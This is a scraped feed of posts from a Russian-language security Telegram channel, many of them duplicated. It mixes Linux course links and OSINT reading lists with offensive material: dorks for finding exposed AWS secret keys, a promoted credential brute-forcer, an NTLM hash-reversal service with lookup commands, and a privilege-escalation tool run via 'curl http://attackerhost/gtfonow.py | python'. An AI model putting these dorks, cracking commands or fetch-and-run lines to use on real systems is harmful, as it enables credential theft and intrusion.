Топ 5 инструментов для поиска уязвимостей и эксплоитов:
Searchsploit - предоставляет прямой доступ к Exploit Database из терминала Kali Linux. Пользователи могут использовать мощные команды поиска для быстрого обнаружения эксплоитов и уязвимостей. Этот инструмент является незаменимым помощником для специалистов по безопасности, работающих в среде Kali Linux.
getsploit - сочетает в себе функциональность searchsploit с возможностью загрузки эксплоитов. Он позволяет пользователям проводить онлайн-поиск по таким базам данных, как Exploit-DB, Metasploit и Packetstorm. Кроме того, он дает возможность загружать исходный код эксплоитов напрямую, что делает поиск и получение необходимых данных для пентестинга простым и эффективным.
CVEMap - Инструмент от Projectdiscovery, которая создана для быстрого и удобного поиска по всем известным базам данных уязвимостей.
Pompem - инструмент предустановленный в Parrot OS, автоматизирует процесс поиска эксплоитов и уязвимостей. Он использует передовую систему поиска для проверки таких баз данных, как PacketStorm Security, CXSecurity, ZeroDay, Vulners и NVD.
SiCat - отличается комплексным подходом к поиску эксплоитов. Он умело извлекает информацию об эксплоитах из открытых источников и локальных репозиториев.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Searchsploit - предоставляет прямой доступ к Exploit Database из терминала Kali Linux. Пользователи могут использовать мощные команды поиска для быстрого обнаружения эксплоитов и уязвимостей. Этот инструмент является незаменимым помощником для специалистов по безопасности, работающих в среде Kali Linux.
getsploit - сочетает в себе функциональность searchsploit с возможностью загрузки эксплоитов. Он позволяет пользователям проводить онлайн-поиск по таким базам данных, как Exploit-DB, Metasploit и Packetstorm. Кроме того, он дает возможность загружать исходный код эксплоитов напрямую, что делает поиск и получение необходимых данных для пентестинга простым и эффективным.
CVEMap - Инструмент от Projectdiscovery, которая создана для быстрого и удобного поиска по всем известным базам данных уязвимостей.
Pompem - инструмент предустановленный в Parrot OS, автоматизирует процесс поиска эксплоитов и уязвимостей. Он использует передовую систему поиска для проверки таких баз данных, как PacketStorm Security, CXSecurity, ZeroDay, Vulners и NVD.
SiCat - отличается комплексным подходом к поиску эксплоитов. Он умело извлекает информацию об эксплоитах из открытых источников и локальных репозиториев.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
🔥11👍6❤2😁1
Токены. От появления до продвижения в Active Directory
#статья
О токенах, используемых в операционных системах семейства Windows слышали многие, ведь они являются важным звеном, участвующим в контексте безопасности всей операционной системы. В последнее время появляется все больше и больше материалов посвященных токенам, в которых рассказывают о новых эксплойтах и техниках связанных с ними. В данной статье последовательно изложены теоретическая и практическая части, позволяющие понять важность токенов в операционных системах семейства Windows. Но прежде чем говорить о токенах, мне бы хотелось сказать несколько слов о механизмах, которые пригодятся для понимания работы токенов.
Приятного чтения!
LH | Новости | Курсы | Мемы
#статья
О токенах, используемых в операционных системах семейства Windows слышали многие, ведь они являются важным звеном, участвующим в контексте безопасности всей операционной системы. В последнее время появляется все больше и больше материалов посвященных токенам, в которых рассказывают о новых эксплойтах и техниках связанных с ними. В данной статье последовательно изложены теоретическая и практическая части, позволяющие понять важность токенов в операционных системах семейства Windows. Но прежде чем говорить о токенах, мне бы хотелось сказать несколько слов о механизмах, которые пригодятся для понимания работы токенов.
Приятного чтения!
LH | Новости | Курсы | Мемы
Хабр
Токены. От появления до продвижения в Active Directory
О токенах, используемых в операционных системах семейства Windows слышали многие, ведь они являются важным звеном, участвующим в контексте безопасности всей операционной системы. В последнее время...
👍8❤🔥4🔥3
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Третья серия материалов: "Работа с файлами и директориями"
Назначение пользователей в группы: команда usermod.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
#статья
Третья серия материалов: "Работа с файлами и директориями"
Назначение пользователей в группы: команда usermod.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Назначение пользователей в группы: команда usermod.
Управление пользователями системы и их основными и дополнительными группами – одна из важных задач при администрировании Linux. С ней отлично справляется встроенная команда usermod. Команда usermod работает путем изменения файлов «/etc/passwd» и «/etc/shadow»…
🔥7👍6❤3
Vault7 - огромная коллекция различных документов, публикуемых Wikileaks с 2017 года. Сюда входят руководства по взлому Android, IOS, Windows и умных телевизоров Samsung.
Здесь можно найти несколько способов обхода UAC:
- Artillery. Через Elevated COM Object. Метод обхода заключался в том, что различным доверенным системным приложениям разрешалось повышать уровень UAC без появления окошка. Например, DLL, загруженная в процесс
- Stinger. Этот метод обхода осуществлялся посредством получения токена с процесса, который запущен с высоким уровнем UAC, последующего изменения токена и его переиспользования.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Здесь можно найти несколько способов обхода UAC:
- Artillery. Через Elevated COM Object. Метод обхода заключался в том, что различным доверенным системным приложениям разрешалось повышать уровень UAC без появления окошка. Например, DLL, загруженная в процесс
explorer.exe
, может создать объект IFileOperation
с повышенными правами для работы с привилегированными файлами. POC- Stinger. Этот метод обхода осуществлялся посредством получения токена с процесса, который запущен с высоким уровнем UAC, последующего изменения токена и его переиспользования.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
👍10🔥7❤🔥3❤2
LEGBA
Это многопротокольный брутфорсер учетных данных, созданный с помощью Rust и асинхронной среды выполнения Tokio для достижения лучшей производительности и стабильности при меньшем потреблении ресурсов, чем аналогичные инструменты.
Поддерживаемые протоколы:
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Это многопротокольный брутфорсер учетных данных, созданный с помощью Rust и асинхронной среды выполнения Tokio для достижения лучшей производительности и стабильности при меньшем потреблении ресурсов, чем аналогичные инструменты.
Поддерживаемые протоколы:
AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)
DNS
FTP
HTTP
IMAP
Kerberos
LDAP
MongoDB
MQTT
Microsoft SQL
MySQL
Oracle
PostgreSQL
POP3
RDP
Redis
ScyllaDB / Cassandra
SSH / SFTP
SMTP
STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ)
TCP Port Scanner
Telnet
VNC
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
👍12🔥5❤3
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Третья серия материалов: "Работа с файлами и директориями"
Создание и удаление групп в Linux: команды groupadd и groupdel.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
#статья
Третья серия материалов: "Работа с файлами и директориями"
Создание и удаление групп в Linux: команды groupadd и groupdel.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Создание и удаление групп в Linux: команды groupadd и groupdel.
Для создания новой группы пользователей в Linux используется команда groupadd. Эта команда позволяет указать имя новой группы и гид (GID, Group IDentifier) – уникальный идентификатор группы. Пример использования команды groupadd: sudo groupadd developers…
🔥10👍7❤3
#статья
Docker стал популярным инструментом для упаковки, доставки и запуска приложений в контейнерах. Однако, с ростом популярности Docker также увеличивается количество атак на его инфраструктуру. В данной статье освещаются современные методы атак на Docker, анализируются уязвимости и недопустимые конфигурации, выявляются слабые места в компонентах, а также предоставляется другая полезная информация:
- Privileged Container;
- Exposed Container APIs;
- Container Escape;
- Container Image Tampering;
- Insecure Container Configuration;
- Denial-of-Service (DoS);
- Kernel Vulnerabilities;
- Shared Kernel Exploitation;
- Insecure Container Orchestration;
- Insecure Container Images;
- References.
P.S. Больше полезной информации про Docker:
Безопасность контейнеров в Docker
Обзор сканеров безопасности контейнеров для поиска уязвимостей
Vulnhub – готовые уязвимые окружения Docker для обучения хакингу
Поиск уязвимостей в образах Docker с помощью Snyk
Почему процессы в контейнерах Docker не должны запускаться от имени Root
Docker Remote API Scanner and Exploit
Проброс портов на контейнеры Docker с помощью брандмауэров Linux
Сканирование образов контейнеров на наличие
уязвимостей с помощью Docker Scout
Проверка образов и контейнеров Docker с помощью VirusTotal: пошаговое руководство
Как создавать резервные копии томов Docker
LH | Новости | Курсы | Мемы
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥4👏4
Forwarded from Бэкдор
Яндекс Браузер с помощью нейронок каждый день предотвращает 1,5 млн попыток перехода на сайты мошенников. Браузер ловит за руку фишинговые сайты, даже если их создали только что и вы первый посетитель.
Алгоритм анализирует сотни фактов: когда был создан сайт, ищут ли его в поиске, как часто его посещают и часто ли возвращаются. Если браузер заподозрит неладное — предупредит, что ресурс опасен. С начала тестирования так попались уже 400 тысяч (!) мошеннических сайтов.
Наконец-то родственники больше не будут вводить данные карты на сайте ozom.ru
@whackdoor
Алгоритм анализирует сотни фактов: когда был создан сайт, ищут ли его в поиске, как часто его посещают и часто ли возвращаются. Если браузер заподозрит неладное — предупредит, что ресурс опасен. С начала тестирования так попались уже 400 тысяч (!) мошеннических сайтов.
Наконец-то родственники больше не будут вводить данные карты на сайте ozom.ru
@whackdoor
👍16🔥7🤣6😐3
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Третья серия материалов: "Работа с файлами и директориями"
Управление правами доступа к файлам и директориям для пользователей и групп.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
#статья
Третья серия материалов: "Работа с файлами и директориями"
Управление правами доступа к файлам и директориям для пользователей и групп.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Управление правами доступа к файлам и директориям для пользователей и групп.
В Linux каждый файл и директория имеют свои права доступа, которые определяют, какие операции могут быть выполнены над ними пользователем, группой пользователей или остальными пользователями. Права доступа в Linux представляются в виде трёх групп: владелец…
👍9🔥5❤2😈1
Shodan Dorks
html:"AWS_ACCESS_KEY_ID"
html:"AWS_SECRET_ACCESS_KEY"
html:"AWS_SESSION_TOKEN"
title:"AWS S3 Explorer"
html:"AWS Elastic Beanstalk overview"
html:"OpenSearch Dashboards"
"X-Amz-Server-Side-Encryption"
title:"EC2 Instance Information"
http.title:"Amazon Cognito Developer Authentication Sample"
"Server: EC2ws"
title:"AWS X-Ray Sample Application"
html:"Amazon EC2 Status"
html:"AWS EC2 Auto Scaling Lab"
html:"istBucketResult"
Search Engine Dorks
site:.s3.amazonaws.com "Company"
site:http://s3.amazonaws.com intitle:index.of.bucket “”
site:s3.amazonaws.com "index of /" s3
site:amazonaws.com filetype:xls password
inurl:gitlab "AWS_SECRET_KEY"
inurl:pastebin "AWS_ACCESS_KEY"
inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
Github Dorks
Key:amazon_secret_access_key
amazonaws
aws_access
aws_access_key_id
aws_bucket aws_key
aws_secret
aws_secret_key
aws_token
bucket_password
bucketeer_aws_access_key_id
bucketeer_aws_secret_access_key
cache_s3_secret_key
cloud_watch_aws_access_key
filename:credentials
aws_access_key_id
filename:s3cfg
lottie_s3_api_key
lottie_s3_secret_key
rds.amazonaws.com password
s3_access_key
s3_access_key_id
s3_key s3_key_app_logs
s3_key_assets
s3_secret_key
sandbox_aws_access_key_id
sandbox_aws_secret_access_key
secret_key
eureka.aws
secretkey
filename:.bash_profile
aws
filename:.s3cfg
P.S. Полезная информации на тему «Dorking»:
Что такое Google Dorks?
Поиск уязвимостей на сайте с помощью Google Dorks
Взлом репозитория GitHub с помощью GitHub Dorks
Автоматизированный поиск уязвимостей с помощью Google Dork'ов
dorkscout: автоматическое сканирование google дорков
Взлом сайта с помощью Google Dorks
Важные Google Dorks которые должен знать хакер
uDork
P.S. Читать ещё про атаки на AWS!
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥7
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Третья серия материалов: "Работа с файлами и директориями"
Просмотр информации о пользователях и группах: команды id, whoami и другие.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
#статья
Третья серия материалов: "Работа с файлами и директориями"
Просмотр информации о пользователях и группах: команды id, whoami и другие.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Просмотр информации о пользователях и группах: команды id, whoami и другие.
Одной из ключевых обязанностей системного администратора в операционной системе Linux является контроль и управление пользователями. Каждый пользователь обладает определенными привилегиями и ограничениями, которые необходимо регулировать. В данном материале…
👍8🔥5❤3
Forwarded from IT курсы / Программирование
В данном курсе вы научитесь автоматизировать процесс сборки, тестирования и развертывания ПО в контейнерах Docker. Это позволяет ускорить процесс разработки и уменьшить время на развертывание ПО в производственной среде.
Смотреть курс
LH | Новости | Курсы | Мемы
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥5
NTLM to password
База данных предварительно вычисленных NTLM-хэшей почти на 9 миллиардов записей.
Искать лучше через API, стоимость поиска зависит от способа:
— через форму на главной: 10 поинтов/хэш
— через API: 5 поинтов/хэш
— через балковое (для частых запросов) API: 4 поинта/хэш
Квота на использование пополняется на 5000 поинтов каждые 15 минут.
Пример использования:
Или:
Ссылка на сервис!
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
База данных предварительно вычисленных NTLM-хэшей почти на 9 миллиардов записей.
Искать лучше через API, стоимость поиска зависит от способа:
— через форму на главной: 10 поинтов/хэш
— через API: 5 поинтов/хэш
— через балковое (для частых запросов) API: 4 поинта/хэш
Квота на использование пополняется на 5000 поинтов каждые 15 минут.
Пример использования:
Invoke-WebRequest https://ntlm.pw/[32-character hash] | Select-Object -Expand Content
Или:
curl https://ntlm[.]pw/[/[32-character hash]
Ссылка на сервис!
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
👍11🔥7❤3
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Третья серия материалов: "Работа с файлами и директориями"
Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
#статья
Третья серия материалов: "Работа с файлами и директориями"
Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Chroot - это утилита Linux, которая позволяет создавать изолированное окружение для запуска приложений. Она помогает обеспечить безопасность, провести тестирование и восстановление системы. Команда chroot требует прав администратора. Команда chroot позволяет…
👍10🔥7❤3
Топ популярных постов за прошедшую неделю (сохрани себе и отправь другу):
1. Предыдущий топ статей
2. AWS
3. Обозреваем и практикуем популярные OSINT инструменты
4. Топ 5 инструментов для поиска уязвимостей и эксплоитов
5. Vault7 - огромная коллекция различных документов, публикуемых Wikileaks с 2017 года
6. LEGBA - это многопротокольный брутфорсер учетных данных
7. Attacking Docker
8. 𝗔𝗪𝗦 𝗢𝗦𝗜𝗡𝗧 𝗯𝘆 𝗗𝗼𝗿𝗸𝗶𝗻𝗴
#подборка
LH | Новости | Курсы | Мемы
1. Предыдущий топ статей
2. AWS
3. Обозреваем и практикуем популярные OSINT инструменты
4. Топ 5 инструментов для поиска уязвимостей и эксплоитов
5. Vault7 - огромная коллекция различных документов, публикуемых Wikileaks с 2017 года
6. LEGBA - это многопротокольный брутфорсер учетных данных
7. Attacking Docker
8. 𝗔𝗪𝗦 𝗢𝗦𝗜𝗡𝗧 𝗯𝘆 𝗗𝗼𝗿𝗸𝗶𝗻𝗴
#подборка
LH | Новости | Курсы | Мемы
👍10🔥6❤3
Подборка полезных материалов про OSINT #1:
• Расширение OSINT Chrome: ThreatPinch Lookup.
• Сбор информации при помощи технологии OSINT в связке с DataSploit
• Сбор информации о человеке из открытых баз данных
• OSINT на платформе Telegram
• OSINT. Определение местоположения по фотографии. Глобальные и местные индикаторы. Часть 1
• OSINT. Определение местоположения по фотографии. Глобальные и местные индикаторы. Часть 2
• OSINT. Собираем информацию по Email
• Полезные и актуальные инструменты для OSINT
• Социальная инженерия. Целенаправленные атаки. OSINT
• OSINT. Инструменты для поиска информации о цели
• CSI Linux. Дистрибутив для кибер-расследований и OSINT
• Поиск (пробив) человека с помощью ботов Telegaram с наличием минимальной исходной информацией
• Offensive OSINT часть 1 - OSINT & RDP
• Offensive OSINT часть 2 - Деобфускация и анализ исходного кода + обнаружение сети распространения нелегального контента
• Offensive OSINT часть 3 - Ищем дезинформацию, связанную с выборами, на польском сервисе wykop.pl
• Поиск информации по номеру телефона.
Часть 1
• Разведка и сбора информации — обзор инструментария OSINT
• Snoop Project инструмент разведки на основе открытых данных (OSINT world)
• Инструменты OSINT, которые ускорят исследования в сети
#подборка
LH | Новости | Курсы | Мемы
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍9❤4👏1
На третьей неделе курса "Linux для новичков" мы изучили основные команды для управления пользователями и группами в Linux. Мы научились создавать и удалять пользователей и группы, управлять правами доступа, и познакомились с командами chroot и sudo.
Если вы что-то пропустили и желаете прочитать, то вот список материалов третей недели:
•Создание и удаление пользователей в Linux: команды useradd и userdel.
•Управление паролями пользователей: команда passwd.
•Назначение пользователей в группы: команда usermod.
•Создание и удаление групп в Linux: команды groupadd и groupdel.
•Управление правами доступа к файлам и директориям для пользователей и групп.
•Просмотр информации о пользователях и группах: команды id, whoami и др.
•Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Не забывайте следить и делиться нашим бесплатным курсом "Linux для новичков"!
Первая серия материалов.
Вторая серия материалов.
Следующую неделю мы посвятим теме «Сетевые возможности Linux».
#Linux #обучениеlinux #статьипоLinux
LH | Новости | Курсы | Мемы
Если вы что-то пропустили и желаете прочитать, то вот список материалов третей недели:
Неделя 3: Управление пользователями и группами
•Создание и удаление пользователей в Linux: команды useradd и userdel.
•Управление паролями пользователей: команда passwd.
•Назначение пользователей в группы: команда usermod.
•Создание и удаление групп в Linux: команды groupadd и groupdel.
•Управление правами доступа к файлам и директориям для пользователей и групп.
•Просмотр информации о пользователях и группах: команды id, whoami и др.
•Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Не забывайте следить и делиться нашим бесплатным курсом "Linux для новичков"!
Первая серия материалов.
Вторая серия материалов.
Следующую неделю мы посвятим теме «Сетевые возможности Linux».
#Linux #обучениеlinux #статьипоLinux
LH | Новости | Курсы | Мемы
👍12🔥4❤2
GTFONow
Данный инструмент предназначен для автоматической эскалации привилегий в Unix-подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.
Возможности:
— Автоматическая эксплуатация неправильно настроенных разрешений sudo.
— Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
— Автоматическая эксплуатация неправильных настроенных компонентов ОС.
— Автоматическая эксплуатация через SSH-ключи.
— Автоматическая эксплуатация через файл используемый в cron.
— Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
— Легкий запуск без файлов с помощью
Ссылка на GitHub.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Данный инструмент предназначен для автоматической эскалации привилегий в Unix-подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.
Возможности:
— Автоматическая эксплуатация неправильно настроенных разрешений sudo.
— Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
— Автоматическая эксплуатация неправильных настроенных компонентов ОС.
— Автоматическая эксплуатация через SSH-ключи.
— Автоматическая эксплуатация через файл используемый в cron.
— Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
— Легкий запуск без файлов с помощью
curl http://attackerhost/gtfonow.py | python
Ссылка на GitHub.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
👍11🔥7❤5⚡1
Reb, Blue, Yellow Team. Противостояние или партнёрство в киберпространстве
#статья
Сегодня поговорим с вами на тему, так называемых, команд в сфере информационной безопасности. В основном эта статья предназначена для тех, кто только начинает свой путь в этом направлении или просто до сих пор не определился к какой из "команд" он хочет примкнуть. Мы разберемся как команды и их совместная деятельность дополняют друг друга, и что они из себя представляют.
Читать статью.
LH | Новости | Курсы | Мемы
#статья
Сегодня поговорим с вами на тему, так называемых, команд в сфере информационной безопасности. В основном эта статья предназначена для тех, кто только начинает свой путь в этом направлении или просто до сих пор не определился к какой из "команд" он хочет примкнуть. Мы разберемся как команды и их совместная деятельность дополняют друг друга, и что они из себя представляют.
Читать статью.
LH | Новости | Курсы | Мемы
👍10❤5🔥5
Подборка полезных материалов про OSINT #2:
• OSINT инструменты для Instagram и Facebook
• OSINT с FOCA: что можно узнать из публичных источников?
• CSI Linux. Полное руководство по OSINT. Часть 1. Domain Tools
• Сбор информации с помощью OSINT. Часть 1
• Сбор информации с помощью OSINT. Часть 2
• Поиск и анализ страниц ВКонтакте. OSINT и социальные сети
• Навыки OSINT(интернет-разведки) в кибербезопасности
• Учебное пособие OSINT для отслеживания информации о самолете и рейсе в режиме реального времени
• Ищем профиль по имени пользователя (OSINT)
• Комплексные инструменты OSINT. Сбор информации в сети
• Terra – инструмент OSINT для Twitter и Instagram
• Поиск в мире IoT. Альтернативы Shodan и Censys или OSINT по-китайски. Часть 1
• Комплексные инструменты OSINT. Сбор информации в сети. Часть 2
• Osint-San — инструмент, с которым можно стать кибердетективом
• Обзор Tsurugi Linux. Японское качество OSINT
• Как использовать sherlock
• Простой OSINT с использованием инструмента infooze V 1.0 [С примерами]
• Как выполнять OSINT в браузере с помощью Mitaka
• Сбор информации в Instagram с Osintgram на Kali Linux
• Открытый код. Мой топ 4 инструмента в сфере OSINT
• Открытый код. Инструменты OSINT.
• Telepathy - Набор инструментов для OSINT, позволяющий исследовать Telegram-чаты.
• Hunxploit04 – новый OSINT-инструмент для сбора
информации
• Maryam: Open-source Intelligence(OSINT) Framework
Подборка полезных материалов про OSINT #1
#подборка
LH | Новости | Курсы | Мемы
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥4❤3